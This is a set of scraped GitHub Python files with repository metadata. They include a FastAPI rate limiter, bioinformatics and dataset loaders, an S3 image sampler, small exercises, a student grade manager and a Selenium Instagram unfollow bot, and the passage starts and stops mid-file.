ttl}\n else:\n return {\"call\": True, \"ttl\": ttl}\n\n\ndef limiter(*, max_calls: int = 5, ttl: int = 60):\n \"\"\"\n NOTE: This decorator requires the decorated function to have\n fastAPI Request in the parameters.\n sample usage:\n >>> from fastapi import FastAPI, Request\n >>> app = FastAPI()\n >>>\n >>> @app.get(\"/hello/\") # app is a fastAPI object\n >>> @limiter(max_calls=5, ttl=60) # Max amount of calls is 5 per minute\n >>> async def my_endpoint(request: Request): # request is a fastAPI Request object\n >>> return {\"message\": \"Hello World!\"}\n\n In the example above the order of decorators is important.\n\n Decorator to limit the amount of calls to a specific endpoint.\n Limitation is based on IP address.\n :param max_calls: the maximum amount of calls allowed during ttl\n :param ttl: the time to live of the calls in seconds\n :return: HTTPException OR the function\n \"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n client_ip = kwargs[\"request\"].client.host\n res = await limit(client_ip, max_calls, ttl)\n if res[\"call\"]:\n return await func(*args, **kwargs)\n else:\n raise HTTPException(\n status_code=429,\n detail=f\"\"\"Ratelimited, too many requests. Try again in\n {res['ttl']} seconds.\"\"\",\n headers={\"Retry-After\": res[\"ttl\"]},\n )\n\n return wrapper\n\n return decorator\n","repo_name":"Nipa-Code/lemon-API","sub_path":"lemonapi/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"5997962243","text":"#!/usr/bin/env python\n\"\"\"Create pairs report.\"\"\"\n\nfrom collections import defaultdict\nfrom typing import List, Tuple\n\nimport pandas as pd\nimport panel as pn\nimport typer\nimport hvplot.pandas # noqa\n\npn.extension()\n\nPAIR_TYPES = {\n \"W\": \"walk\",\n \"N\": \"null\",\n \"X\": \"corrupt\",\n \"M\": \"multi\",\n \"R\": \"rescued\",\n \"U\": \"unique\",\n \"D\": \"duplicate\",\n}\n# https://github.com/4dn-dcic/pairsqc/blob/master/pairsqc.py\nORI_NAMES = dict(zip([\"+-\", \"-+\", \"++\", \"--\"], [\"Inner\", \"Outer\", \"Right\", \"Left\"]))\n\n\n# %%\ndef _parse_totals_table(data=List[Tuple[str, str]]):\n \"\"\"Parse totals table.\"\"\"\n res = []\n total = 0\n for key, val in data:\n key = key.strip()\n if key == \"total\":\n section = \"all\"\n total = int(val)\n elif key in (\"total_unmapped\", \"total_single_sided_mapped\", \"total_mapped\"):\n section = \"mapping\"\n elif key in (\"total_dups\", \"total_nodups\"):\n section = \"duplicates\"\n elif key in (\"cis\", \"trans\"):\n section = \"cis/trans\"\n elif key.startswith(\"cis_\"):\n section = \"distance\"\n else:\n raise ValueError(f\"#{key}#\")\n\n res.append((section, key, int(val)))\n df = pd.DataFrame(res, columns=[\"Section\", \"Type\", \"Count\"])\n df[\"Perc. of Total\"] = df[\"Count\"] / total * 100.0\n df[\"Perc. of Section\"] = df.groupby(\"Section\")[\"Count\"].transform(\n lambda x: 100.0 * x / x.sum()\n )\n return df\n\n\ndef _parse_pair_types(data=List[Tuple[str, str]]):\n \"\"\"Parse pair types.\"\"\"\n res = []\n for code, val in data:\n left, right = code[0], code[1]\n label = f\"{PAIR_TYPES[left]}-{PAIR_TYPES[right]}\"\n res.append((code, left, right, label, int(val)))\n df = pd.DataFrame(res, columns=[\"code\", \"left\", \"right\", \"label\", \"pairs\"])\n df[\"perc\"] = 100.0 * df[\"pairs\"] / df[\"pairs\"].sum()\n return df\n\n\ndef _parse_chrom_freq(data=List[Tuple[str, str]]):\n \"\"\"Parse chrom freq.\"\"\"\n res = []\n for code, val in data:\n chr1, chr2 = code.split(\"/\")\n res.append((chr1, chr2, int(val)))\n\n df = (\n pd.DataFrame(res, columns=[\"chrom1\", \"chrom2\", \"count\"])\n .set_index([\"chrom1\", \"chrom2\"])\n .sort_index()\n .unstack(fill_value=0)\n )\n df = df.xs(\"count\", axis=1)\n return df\n\n\ndef _parse_summary(data=List[Tuple[str, str]]):\n \"\"\"Parse summary.\"\"\"\n res = []\n for key, val in data:\n res.append({\"statistic\": key, \"value\": float(val)})\n return pd.DataFrame(res)\n\n\ndef _parse_dist_freq(data=List[Tuple[str, str]]):\n \"\"\"Parse dist freq.\"\"\"\n res = []\n for key, val in data:\n interval, ori = key.split(\"/\")\n interval = interval.strip()\n if interval.endswith(\"+\"):\n bin_left = bin_right = interval[:-1]\n else:\n bin_left, bin_right = interval.split(\"-\")\n res.append(\n (int(bin_left), int(bin_right), ori, ORI_NAMES[ori] + f\" ({ori})\", int(val))\n )\n res = pd.DataFrame(\n res, columns=[\"bin_left\", \"bin_right\", \"ori\", \"ori_name\", \"count\"]\n )\n return res\n\n\ndef read_pairs_stats(path):\n \"\"\"Read Pairs stats.\"\"\"\n _data = defaultdict(list)\n with open(path) as f:\n for i in f:\n if \"/\" not in i:\n table = \"totals\"\n else:\n table, i = i.split(\"/\", 1)\n _data[table].append(tuple(i.strip().split(\"\\t\")))\n totals = _parse_totals_table(_data[\"totals\"])\n pair_types = _parse_pair_types(_data[\"pair_types\"])\n chrom_freq = _parse_chrom_freq(_data[\"chrom_freq\"])\n summary = _parse_summary(_data[\"summary\"])\n dist_freq = _parse_dist_freq(_data[\"dist_freq\"])\n return totals, pair_types, chrom_freq, summary, dist_freq\n\n\ndef main(pair_stats, report_html, show_chroms=None):\n \"\"\"Entry point.\"\"\"\n totals, pair_types, chrom_freq, summary, dist_freq = read_pairs_stats(\n pair_stats)\n totals_pane = pn.Column(\n pn.Row(\n pn.pane.DataFrame(totals.set_index(\n [\"Section\", \"Type\"]), width=600),\n totals.query(\"Section == 'mapping'\").hvplot.bar(\n x=\"Section\",\n y=\"Perc. of Total\",\n by=\"Type\",\n hover_cols=[\"Count\", \"Perc. of Total\"],\n stacked=True,\n width=400,\n title=\"Mapping Rate\",\n ),\n ),\n totals.query(\"Section == 'distance'\").hvplot.bar(\n x=\"Type\", y=\"Perc. of Section\",\n title=\"Genomic Distance Distribution\"\n ),\n )\n\n pair_type_pane = pn.Column(\n pair_types.hvplot.bar(\n x=\"label\", y=\"perc\", hover_cols=[\"pairs\"], title=\"Pair Types\"\n ),\n pn.pane.DataFrame(pair_types, width=600),\n )\n show_chroms_columns = chrom_freq.columns\n show_chroms_index = chrom_freq.index\n if show_chroms is not None:\n show_chroms_columns = show_chroms_columns.intersection(show_chroms)\n show_chroms_index = show_chroms_index.intersection(show_chroms)\n chrom_freq = chrom_freq.reindex(\n index=show_chroms_index, columns=show_chroms_columns, fill_value=0\n )\n chrom_contact_pane = pn.Row(\n chrom_freq.hvplot.heatmap(\n width=600,\n height=600,\n colorbar=False,\n rot=45,\n colormap=\"viridis\",\n title=\"Contact Count\",\n ),\n chrom_freq\n .pipe(lambda x: x.div(x.sum(axis=0), axis=1))\n .hvplot.heatmap(\n width=600,\n height=600,\n colorbar=False,\n rot=45,\n colormap=\"viridis\",\n title=\"Contact Proportion (normalized by Chromosome)\",\n ),\n )\n\n distance_pane = pn.Row(\n dist_freq.hvplot.line(\n x=\"bin_right\", by=\"ori_name\", y=\"count\", logx=True)\n )\n\n report = pn.Tabs(\n (\"Pairs\", totals_pane),\n (\"Pair Types\", pair_type_pane),\n (\"Chrom Contacts\", chrom_contact_pane),\n (\"Distance\", distance_pane),\n )\n report.save(report_html)\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","repo_name":"epi2me-labs/wf-pore-c","sub_path":"bin/create_pairs_report.py","file_name":"create_pairs_report.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"} +{"seq_id":"28234150437","text":"import copy\nimport os.path\nimport sys\n\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision.datasets import VisionDataset\nfrom torch.utils.data.dataloader import DataLoader\nfrom typing import NoReturn, List\nimport json\nimport imagesize\nfrom tqdm import tqdm\nfrom prefetch_generator import BackgroundGenerator\n\nclass PrefetchLoader(DataLoader):\n def __iter__(self):\n return BackgroundGenerator(super().__iter__())\n\nclass Reader():\n \"\"\"\n to read the data\n\n feed_dict for dataloader:\n use dict to load (convenient for later use)\n should contain:\n im_data,im_info,gt_boxes,num_box\n gt_boxes: ground true roi and bbox (0-3bbox, 4target)\n im_info: w,h,scale\n \"\"\"\n\n def __init__(self, args):\n self.dataset = args.dataset_name\n self.dataset_path = args.dataset_path\n self.w = 256\n self.h = 256\n\n self.preprocess()\n\n def preprocess(self) -> NoReturn:\n \"\"\"\n preprocess the file (dataset path)\n :return:\n \"\"\"\n if self.dataset == 'tt100k_2021':\n file_path = os.path.join(self.dataset_path, 'annotations_all.json')\n with open(file_path, 'rb') as f:\n data = json.load(f)\n\n self.classes = data['types']\n self._assign_ids()\n imgs = data['imgs']\n\n # for img_id in imgs:\n self.max_num=0\n for img_id in tqdm(imgs, desc='find max len',\n leave=False, ncols=100, mininterval=0.01):\n objects = imgs[img_id]['objects']\n self.max_num=max(self.max_num,len(objects))\n # self.max_num = min(self.max_num, 1)\n train_l = []\n test_val_l = []\n li = ['new_train', 'new_test', 'new_other'] #\n flag=False\n for l in li:\n p = os.path.join('./data/tt100k_2021/', l)\n if not os.path.exists(p):\n flag=True\n os.makedirs(p)\n # for img_id in imgs:\n for img_id in tqdm(imgs, desc='preprocess target',\n leave=False, ncols=100, mininterval=0.01):\n path = imgs[img_id]['path']\n new_path = os.path.join('./data/tt100k_2021/', path)\n objects = imgs[img_id]['objects']\n if not flag:\n # w, h = imagesize.get(new_path)\n w, h = imagesize.get(os.path.join('./data/tt100k_2021/', 'new_' + path))\n else:\n img = Image.open(new_path)\n w, h = img.size\n img = img.resize((self.w, self.h))\n num_box = len(objects)\n gt_boxes = []\n for o in objects:\n bbox = o['bbox']\n category = o['category']\n gt_box = [\n bbox['xmin'] / w * self.w,\n bbox['xmax'] / w * self.w,\n bbox['ymin'] / h * self.h,\n bbox['ymax'] / h * self.h,\n self.class_dict[category]\n ]\n gt_boxes.append(gt_box)\n gt_boxes = np.array(gt_boxes)\n # gt_boxes = np.array(gt_boxes)[:self.max_num,:]\n # num_box=min(self.max_num,num_box)\n gt_boxes=np.pad(gt_boxes,((0,self.max_num-num_box),(0,0)))\n piece = {\n 'path': os.path.join('./data/tt100k_2021/', 'new_' + path),\n 'im_info': torch.from_numpy(np.array([w, h])),\n 'gt_boxes': torch.from_numpy(gt_boxes),\n 'num_box': torch.from_numpy(np.array([num_box]))\n }\n if flag:\n img.save(os.path.join('./data/tt100k_2021/', 'new_' + path))\n if 'train' in path:\n train_l.append(piece)\n elif 'test' in path:\n test_val_l.append(piece)\n tes_val_len = len(test_val_l)\n split = int(np.ceil(tes_val_len * 0.8))\n test_l = test_val_l[:split]\n val_l = test_val_l[split:]\n self.data = {\n 'train': train_l,\n 'test': test_l,\n 'val': val_l\n }\n\n def _assign_ids(self):\n ids = 1\n self.class_dict = {'bg': 0}\n for c in self.classes:\n self.class_dict[c] = ids\n ids += 1\n\n def get_loader(self, phase: str, batch_size: int) -> DataLoader:\n \"\"\"\n :param phase: train or test (may be has val set\n :param batch_size: the batch size of dataloader\n :return: a dataloader for train or test\n \"\"\"\n data = self.data[phase]\n image_set=ImageSet(data)\n return DataLoader(image_set, batch_size=batch_size, num_workers=16, collate_fn=ImageSet._collate)\n\nclass ImageSet(VisionDataset):\n def __init__(self, data):\n super(ImageSet, self).__init__(root='')\n self.datas = data\n self.transform = transforms.Compose([\n transforms.ToTensor()\n ])\n # target_transform=\n\n def __len__(self):\n return len(self.datas)\n\n def __getitem__(self, idx: int):\n data = self.datas[idx]\n img = Image.open(data['path'])\n d = copy.deepcopy(data)\n d['im_data'] = self.transform(img)\n return d\n\n @staticmethod\n def _collate(dicts:List[dict]):\n # t1 = time.time()\n # data = [(d['im_data'], d['im_info'], d['gt_boxes'],d['num_box']) for d in dicts]\n # data = list(zip(*data))\n r= {\n 'im_data':torch.stack([d['im_data'] for d in dicts]),\n 'im_info': torch.stack([d['im_info'] for d in dicts]),\n 'gt_boxes': torch.stack([d['gt_boxes'] for d in dicts]),\n 'num_box': torch.stack([d['num_box'] for d in dicts])\n }\n # print(time.time()-t1)\n return r\n\n\nif __name__ == '__main__':\n class args:\n dataset_name = 'tt100k_2021'\n dataset_path = '../data/tt100k_2021'\n\n\n r = Reader(args)\n md = ImageSet(r.data['train'])\n dl = PrefetchLoader(md,batch_size=256, num_workers=8, collate_fn=ImageSet._collate)#\n #\n import time\n\n t1 = time.time()\n t0=t1\n cnt = 0\n for d in dl:\n for k in d:\n d[k].to('cuda:1')\n cnt += 1\n t2=time.time()\n print( t2- t1, cnt)\n sys.stdout.flush()\n t1=t2\n # if cnt == 15:\n # break\n print(time.time() - t0,cnt)","repo_name":"HouraisanMokou/traffic_detect","sub_path":"helper/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74023620389","text":"#!/usr/bin/env python\n\n\"\"\" compute the spinex\"\"\"\n\nimport os,sys\n\ndef do_with_psipred(fr_n):\n fr=open(fr_n,'r')\n predicts=[line.strip() for line in fr.readlines()]\n fr.close()\n \n AA=\"\"\n SS=\"\"\n for i in range(len(predicts)): # donot do with header\n if predicts[i]:\n onepredict=predicts[i].split()\n SS=SS+onepredict[2]\n AA=AA+onepredict[1]\n return (AA,SS)\n\n\n\n\ndef my_dowith_psipred(fasta_f,ssfolder):\n \"\"\"read in fasta;psipred output folder\"\"\"\n fr_n=fasta_f\n fr=open(fr_n,'r')\n lines=[line.strip() for line in fr.readlines()]\n fr.close()\n AA=\"\"\n SS=\"\"\n AAS=[]\n SSS=[]\n for i in range(len(lines)):\n if len(lines[i])>0 and lines[i][0]=='>':\n proid=lines[i].split()[0][1:]\n #proseq=lines[i+1]\n output_f=\"%s/%s.ss\" %(ssfolder,proid)\n if os.path.isfile(output_f):\n AA,SS=do_with_psipred(output_f)\n else:\n AA=\"\"\n SS=\"\"\n print(\"can not find PSIPRED prediction files %s\" %proid)\n AAS.append(AA)\n SSS.append(SS)\n return((AAS,SSS))\n \ndef api_dowith_psipred(psipredfn):\n ### return predicted ss\n AA=\"\"\n SS=\"\"\n if os.path.isfile(psipredfn):\n AA,SS=do_with_psipred(psipredfn)\n else:\n AA=\"\"\n SS=\"\"\n print(\"can not find PSIPRED prediction files %s\" %psipredfn)\n return(SS)\n \n# =============================================================================\n# if __name__==\"__main__\":\n# if len(sys.argv)<3:\n# print(\"Usage: my_dowith_psipred.py fasta_f, folder, fw_n\")\n# else:\n# fasta_f=sys.argv[1]\n# folder=sys.argv[2]\n# aas,sss=my_dowith_psipred(fasta_f,folder)\n# print(aas)\n# print(sss)\n# \n# =============================================================================\n\n","repo_name":"cliffgao/PSIONplusm","sub_path":"bin/api_02_dowith_psipred.py","file_name":"api_02_dowith_psipred.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71554007590","text":"import json\nimport random\n\nimport s3fs\n\ndef get_image_data(folder=\"jpgs\",filters=None):\n\tfs = s3fs.S3FileSystem()\n\n\tif filters:\n\t\timage_data_path = f'brissonstagram/inventory/{folder}-metadata.json'\n\telse:\n\t\timage_data_path = f'brissonstagram/inventory/{folder}.json'\n\n\tif fs.exists(image_data_path):\n\t\twith fs.open(image_data_path,'r') as f:\n\t\t\timages = json.loads(f.read())\n\telse:\n\t\tif filters:\n\t\t\tfolder = 'metadata/jpgs'\n\t\telse:\n\t\t\tfolder = 'jpgs'\n\t\timages = create_image_inventory(folder=folder)\n\n\tif filters:\n\n\t\timages = [i for i in images if i.get('palette').get('complexity')>100]\n\n\t\tif 'red' in filters:\n\t\t\timages = [i for i in images if (i.get('palette').get('R')>i.get('palette').get('B')) and (i.get('palette').get('R')>i.get('palette').get('G'))]\n\n\t\tif 'green' in filters:\n\t\t\timages = [i for i in images if (i.get('palette').get('G')>i.get('palette').get('B')) and (i.get('palette').get('G')>i.get('palette').get('R'))]\n\n\t\tif 'blue' in filters:\n\t\t\timages = [i for i in images if (i.get('palette').get('B')>i.get('palette').get('R')) and (i.get('palette').get('B')>i.get('palette').get('G'))]\n\n\t\tif 'faces' in filters:\n\t\t\timages = [i for i in images if len(i.get('faces').get('FaceDetails'))>0]\n\n\treturn images\n\n\ndef create_image_inventory(folder=\"jpgs\"):\n\tfs = s3fs.S3FileSystem()\n\tkeys = fs.find(f'brissonstagram/{folder}')\n\t\n\tdata = [{'url':f'https://brissonstagram.s3.amazonaws.com/{\"/\".join(k.split(\"/\")[1:])}'} for k in keys]\n\n\twith fs.open(f'brissonstagram/inventory/{folder}.json','w') as f:\n\t\tf.write(json.dumps(data))\n\n\treturn data\n\n\ndef get_sample_of_images(folder=\"jpgs\",n=100,force_update=False,filters=None):\n\tif force_update:\n\t\tcreate_image_inventory(folder=folder)\n\timages = get_image_data(folder=folder,filters=filters)\n\tsample = random.choices(images,k=n)\n\tfor img in sample:\n\t\timg['id'] = img['url'].split('/')[-1].split('.')[0]\n\t\taxes = ['x','y','z']\n\t\trandom.shuffle(axes)\n\t\timg[axes[0]] = (1+random.random()*.5)*random.choice([-1,1])\n\t\timg[axes[1]] = 1.5-3*random.random()\n\t\timg[axes[2]] = 1.5-3*random.random()\n\treturn sample\n\n\t","repo_name":"HarryBrisson/brissonstagram","sub_path":"app/brissonstagram.py","file_name":"brissonstagram.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7612669617","text":"import sys\nimport math\n\nMOD = 10 ** 9 + 7\n\n\ndef main():\n S = input()\n\n for i in range(len(S)-1):\n if S[i] == S[i+1]:\n print('Bad')\n return\n\n print('Good')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tamanyan/coding-problems","sub_path":"ABC/131/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"6365106708","text":"#!/usr/bin/python3\n\n\ndef max_integer(my_list=[]):\n Max = 0\n size = len(my_list)\n if size == 0:\n return None\n else:\n for i in my_list:\n if i > Max:\n Max = i\n return Max\n","repo_name":"KingsManhub/alx-higher_level_programming","sub_path":"0x03-python-data_structures/9-max_integer.py","file_name":"9-max_integer.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38950704339","text":"class User:\n def __init__(self, user_id: int, username):\n self.user_id = user_id\n self.username = username\n self.books = []\n\n\n def get_book(self, author: str, book_name: str, days_to_return: int, library):\n if author not in library.books_available:\n return\n\n if book_name in library.all_rented_books:\n days_left = library.all_rented_books[book_name]\n return f\"The book \\\"{book_name}\\\" is already rented and will be available in {days_left} days!\"\n\n if book_name not in library.books_available[author]:\n return\n\n # Add record in the library rented_books\n if self.username not in library.rented_books:\n library.rented_books[self.username] = {book_name: days_to_return}\n else:\n library.rented_books[self.username][book_name] = days_to_return\n\n # Change books_available\n library.books_available[author].remove(book_name)\n # Add book to the User books\n self.books.append(book_name)\n\n library.all_rented_books[book_name] = days_to_return\n return f\"{book_name} successfully rented for the next {days_to_return} days!\"\n\n def return_book(self, author: str, book_name: str, library):\n if book_name not in self.books:\n return f\"{self.username} doesn't have this book in his/her records!\"\n\n self.books.remove(book_name)\n library.books_available[author].append(book_name)\n library.rented_books[self.username].pop(book_name)\n\n def info(self):\n books = sorted(self.books)\n return ', '.join(books)\n\n def __str__(self):\n return f\"{self.user_id}, {self.username}, {self.books}\"\n\n","repo_name":"Xeztor/Softuni_Software-Engineering-Path","sub_path":"Python_Advanced/(P)OOP/02_classes_and_instances/07_library/project/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21168136453","text":"import sys\nfrom selenium import webdriver\nfrom time import sleep\nfrom pprint import pprint\n\n\nwhite_list = [\n 'theminiaturesvault',\n 'siegestudios',\n 'miniwargaming',\n 'warhammerofficial',\n 'immersive_world_crafter',\n 'toadtimemachine',\n 'gatwickgames',\n 'nonzerosumgames',\n 'tarsasnavigator.hu',\n 'nemonovaart',\n 'the_pickled_dragon',\n 'chadwickboseman',\n 'therock',\n 'clarkgregg',\n 'kevinhart4real',\n 'looperhq',\n 'vancityreynolds',\n 'igndotcom',\n 'thatkevinsmith',\n 'rottentomatoes',\n 'comicbook',\n 'mcu_direct',\n 'tessamaethompson',\n 'prattprattpratt',\n 'hamillhimself',\n 'evangelinelillyofficial',\n 'starwars',\n 'chrishemsworth',\n 'dccomics',\n 'jonfavreau',\n 'samuelljackson',\n 'thehughjackman',\n 'karengillan',\n 'therealstanlee',\n 'robertdowneyjr',\n 'tomholland2013',\n 'markruffalo',\n 'renner4real',\n 'marvel',\n 'therussobrothers',\n 'marvelstudios',\n 'iamfires',\n 'darrenlatham',\n]\n\n\nclass GramBot:\n def __init__(self, username, pw):\n self.driver = webdriver.Chrome()\n self.username = username\n self.driver.get(\"https://instagram.com\")\n sleep(2)\n self.driver.find_element_by_xpath(\"//a[contains(text(), 'Log in')]\")\\\n .click()\n sleep(2)\n self.driver.find_element_by_xpath(\"//input[@name=\\\"username\\\"]\")\\\n .send_keys(username)\n self.driver.find_element_by_xpath(\"//input[@name=\\\"password\\\"]\")\\\n .send_keys(pw)\n self.driver.find_element_by_xpath('//button[@type=\"submit\"]')\\\n .click()\n sleep(4)\n self.driver.find_element_by_xpath(\"//button[contains(text(), 'Not Now')]\")\\\n .click()\n sleep(2)\n\n def get_unfollowed(self):\n self.driver.find_element_by_xpath(\"//a[contains(@href,'/{}')]\".format(self.username))\\\n .click()\n sleep(2)\n self.driver.find_element_by_xpath(\"//a[contains(@href,'/following')]\")\\\n .click()\n following = self._get_names()\n self.driver.find_element_by_xpath(\"//a[contains(@href,'/followers')]\")\\\n .click()\n followers = self._get_names()\n not_following_back = [user for user in following if user not in followers]\n to_unfollow = [user for user in not_following_back if user not in white_list]\n to_unfollow.reverse()\n\n return to_unfollow\n\n def _get_names(self):\n sleep(2)\n scroll_box = self.driver.find_element_by_xpath(\"/html/body/div[4]/div/div[2]\")\n\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight); \n return arguments[0].scrollHeight;\n \"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n # close button\n self.driver.find_element_by_xpath(\"/html/body/div[4]/div/div[1]/div/div[2]/button\") \\\n .click()\n return names\n\n def unfollow_users(self, list_of_users):\n for user in list_of_users:\n #print(\"'\" + user)\n self.driver.get(\"https://www.instagram.com/\" + user)\n sleep(5)\n\n # check if verified\n is_verified = self.driver.find_elements_by_class_name(\"coreSpriteVerifiedBadge\")\n #pprint(is_verified)\n\n if is_verified:\n print(\"'\" + user + \"', # has checkmark!!\")\n sleep(20)\n else:\n sleep(60)\n self.driver.find_element_by_xpath('//button[text()=\"Following\"]') \\\n .click()\n self.driver.find_element_by_xpath('//button[text()=\"Unfollow\"]') \\\n .click()\n sleep(35)\n\n def close_browser(self):\n self.driver.quit()\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) > 1:\n\n username = sys.argv[1]\n password = sys.argv[2]\n\n # log in\n bot = GramBot(username, password)\n\n # find unfollowers\n to_unfollow = bot.get_unfollowed()\n\n # unfollow those not on white list\n bot.unfollow_users(to_unfollow)\n\n # close selenium\n bot.close_browser()\n\n else:\n\n print(\"Specify username and password\")\n","repo_name":"omiq/instagram-automation","sub_path":"unfollow.py","file_name":"unfollow.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"20875867950","text":"def isPars(num):\n res = (num % 2 == 0)\n return res\n\ndef sumPars(list):\n sum = 0\n for num in list:\n if(isPars(num)):\n sum += num\n \n return sum\n\nlist_numbers = [5, 10, 6, 2, 7, 4, 8, 3]\n\nsum = sumPars(list_numbers)\nprint(f'O valor total de números pares da lista é: [{sum}]')","repo_name":"MatheusPalmieri/estacio-python","sub_path":"02.Python Estruturado/aula_09.py","file_name":"aula_09.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34061795934","text":"\"\"\"\nMade by - \nRohan Shingre - MSM19B012\n\nThingSpeak Fields:\n1) Field 1: Temperature\n2) Field 2: Humidity\n3) Field 3: Light\n4) Field 4: Pressure\nRead API Endpoint: https://api.thingspeak.com/channels/1312819/feeds.json?api_key=C2BX4LOOP9PEULZG&results=5\n\"\"\"\nimport requests, sqlite3\n\nresponse = requests.get(\n \"https://api.thingspeak.com/channels/1312819/feeds.json?api_key=C2BX4LOOP9PEULZG&results=5\"\n)\n\nif(response.ok):\n response_in_json = response.json()\nelse:\n exit(1) #Exiting if we get Invalid Response\n\ndata = response_in_json.get(\"feeds\")\n\nconnection = connection = sqlite3.connect(\"response.db\")\ncursor = connection.cursor()\n\ncursor.execute(\n \"CREATE TABLE Response (Id INTEGER,Temperature INTEGER, Humidity INTEGER, Light INTEGER, Pressue INTEGER)\"\n) \n\nfor i in data:\n id_ = i['entry_id']\n temperature = int(i['field1'])\n humidity = int(i['field2'])\n light = int(i['field3'])\n pressure = int(i['field4'])\n\n cursor.execute(f\"INSERT INTO Response VALUES ({id_}, {temperature}, {humidity}, {light}, {pressure})\")\n\n\nconnection.commit() \n\nprint(\"Sucessfully Written Response from thingSpeak in database.\")","repo_name":"Ulorewien/thingSpeak","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30582367021","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# file:6.py\n# author:Asus\n# datetime:2021/5/9 15:49\n# software: PyCharm\n'''\n六 用面向对象,实现一个学生Python成绩管理系统;\n 学生的信息存储在文件中;学生信息的字段有(班级,学号,姓名, Python成绩)\n 实现对学生信息及成绩的增,删,改,查方法;\n'''\n\n# import module your need\n\nimport json\n\n\nclass Student:\n Students = {}\n\n def add_stu(self, id_stu, name, classes, score):\n self.Students[id_stu] = [name, classes, score]\n print('添加成功!')\n\n def del_stu(self, id_stu):\n self.Students.pop(id_stu)\n print('删除成功!')\n\n def update_stu(self, id_stu, name, classes, score):\n self.Students[id_stu] = [name, classes, score]\n print('修改成功!')\n\n def search_stu(self, id_stu):\n if id_stu in self.Students:\n print(f'学号:{id_stu}\\n姓名:{self.Students[id_stu][0]}\\n'\n f'班级:{self.Students[id_stu][1]}\\nPython成绩:{self.Students[id_stu][2]}')\n else:\n print('不存在此学生!')\n\n def save_stu(self):\n with open('./6/json_stu.json', 'w', encoding='utf-8') as f:\n json.dump(self.Students, f)\n print('保存成功!')\n\n def load_stu(self):\n with open('./6/json_stu.json', 'r', encoding='utf-8') as f:\n self.Students = json.load(f)\n self.getInfo()\n\n def getInfo(self):\n print('学号 姓名 班级 python成绩\\n——————————————————————————————————————————————\\n')\n for k, v in self.Students.items():\n print(f'{k} {v[0]} {v[1]} {v[2]}')\n\n\nif __name__ == '__main__':\n stu = Student()\n print('学生Python成绩管理系统\\n1.增加;\\n2.删除;\\n3.修改;\\n4.查询;\\n5.读档;\\n6.保存。\\n 0.退出')\n flag = int(input('输入功能序号'))\n while flag != 0:\n if flag == 1:\n print('增加信息:')\n id_stu = input('输入学号:')\n name = input('输入姓名:')\n classes = input('输入班级:')\n score = input('输入python成绩:')\n stu.add_stu(id_stu, name, classes, score)\n elif flag == 2:\n print('删除信息:')\n id_stu = input('输入需删除学生的学号:')\n stu.del_stu(id_stu)\n elif flag == 3:\n print('修改信息:')\n id_stu = input('输入需修改信息学生的学号:')\n print('请输入修改后的信息:')\n name = input('输入姓名:')\n classes = input('输入班级:')\n score = input('输入python成绩:')\n stu.update_stu(id_stu, name, classes, score)\n elif flag == 4:\n print('查询信息:')\n id_stu = input('输入需查询信息学生的学号:')\n stu.search_stu(id_stu)\n elif flag == 5:\n print('读档')\n stu.load_stu()\n elif flag == 6:\n print('保存')\n stu.save_stu()\n\n print('学生Python成绩管理系统\\n1.增加;\\n2.删除;\\n3.修改;\\n4.查询;\\n5.读档;\\n6.保存。\\n 0.退出')\n flag = int(input('输入功能序号'))\n","repo_name":"xbx12138/Python_study_120191080123","sub_path":"homework/homework06/6_Person_Dog_fight.py","file_name":"6_Person_Dog_fight.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12380581546","text":"import os\nimport io\nimport boto3\nimport csv, logging, json\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n# grab environment variables\nENDPOINT_NAME = os.environ['ENDPOINT_NAME']\nruntime= boto3.client('runtime.sagemaker')\n\ndef lambda_handler(event, context):\n try:\n logger.info('## ENVIRONMENT VARIABLES\\r' + json.dumps(dict(**os.environ)))\n eventJsonStr=json.dumps(event)\n logger.info('## EVENT\\r' + eventJsonStr)\n logger.info('## CONTEXT\\r' + str(context))\n industryMapping={ \"consulting\": \"1,0,0,0,0,0,0,0\",\n \"retail\" : \"0,1,0,0,0,0,0,0\", \n \"service\" : \"0,0,1,0,0,0,0,0\",\n \"health\" : 